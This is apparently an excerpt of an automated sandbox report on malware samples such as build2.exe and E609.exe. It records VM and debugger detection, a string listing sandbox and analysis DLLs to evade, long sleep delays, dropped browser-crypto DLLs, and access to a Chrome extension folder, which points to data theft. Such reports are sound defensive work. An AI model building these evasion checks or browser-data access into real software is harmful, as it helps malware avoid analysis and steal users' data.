            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\rujtcguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
            Source: rujtcgu, 00000004.00000002.1982713687.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
            Source: rujtcgu, 00000022.00000002.2344189167.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKC
            Source: build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
            Source: file.exe, 00000000.00000002.1710176306.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK'
            Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_0497771C rdtsc 9_2_0497771C
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,15_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,10_2_0040E670
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,15_2_0040E670
            Source: C:\Users\user\AppData\Local\Temp\E609.exeThread delayed: delay time: 700000Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 428Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1382Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 614Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 743Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 745Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 414
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 395
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\nss3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\softokn3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-39505
            Source: C:\Windows\explorer.exe TID: 5088Thread sleep time: -138200s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6516Thread sleep time: -61400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6472Thread sleep time: -30900s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exe TID: 6596Thread sleep time: -700000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164Thread sleep count: 183 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164Thread sleep time: -41175s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,10_2_0040FB98
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,15_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,15_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,15_2_0040FB98
            Source: C:\Users\user\AppData\Local\Temp\E609.exeThread delayed: delay time: 700000Jump to behavior
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW00
            Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000008DAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUSndClass H
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware_
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000D0CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000001.00000000.1688547736.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yt
            Source: E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00op
            Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000l
            Source: explorer.exe, 0000002A.00000002.2880479170.0000000004E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXT_RVMWare
            Source: explorer.exe, 0000002A.00000003.2707064136.0000000008E66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterL
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
            Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: explorer.exe, 0000002A.00000002.2891687444.0000000009001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000Pca
            Source: explorer.exe, 0000002A.00000003.2739474666.000000000D17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~1HI4
            Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareD64
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000001.00000000.1690075566.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware V
            Source: explorer.exe, 0000002A.00000003.2739943356.000000000D176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\E609.exeAPI call chain: ExitProcess graph end nodegraph_10-39507
            Source: C:\Users\user\AppData\Local\Temp\E609.exeAPI call chain: ExitProcess graph end nodegraph_15-41755
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_0497771C rdtsc 9_2_0497771C
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00424168 _memset,IsDebuggerPresent,10_2_00424168
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_0042A57A
